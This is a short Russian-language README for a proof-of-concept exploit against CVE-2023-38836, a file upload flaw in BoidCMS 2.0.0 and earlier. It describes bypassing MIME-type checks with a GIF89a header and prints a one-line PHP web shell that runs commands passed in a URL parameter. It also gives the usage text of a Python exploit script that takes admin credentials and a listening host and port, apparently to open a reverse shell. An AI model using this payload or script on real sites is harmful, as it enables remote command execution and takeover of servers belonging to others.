
PoC-эксплойт для уязвимости загрузки файлов в BoidCMS версии <=2.0.0
Уязвимость загрузки файлов в BoidCMS v.2.0.0 позволяет аутентифицированному атакующему загрузить файл опасного типа (CWE-434).
Для эксплуатации атакующий может добавить GIF-заголовок, чтобы обойти проверки MIME-типа.
GIF89a;
<?php system($_GET["cmd"]); ?>
использование: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]
Эксплойт для CVE-2023-38836
опции:
-h, --help показать это справочное сообщение и выйти
-u URL, --url URL URL веб-сайта
-U USER, --user USER имя пользователя администратора
-P PASSWD, --passwd PASSWD
пароль администратора
-l LHOST, --lhost LHOST
прослушивающий хост
-p LPORT, --lport LPORT
прослушивающий порт
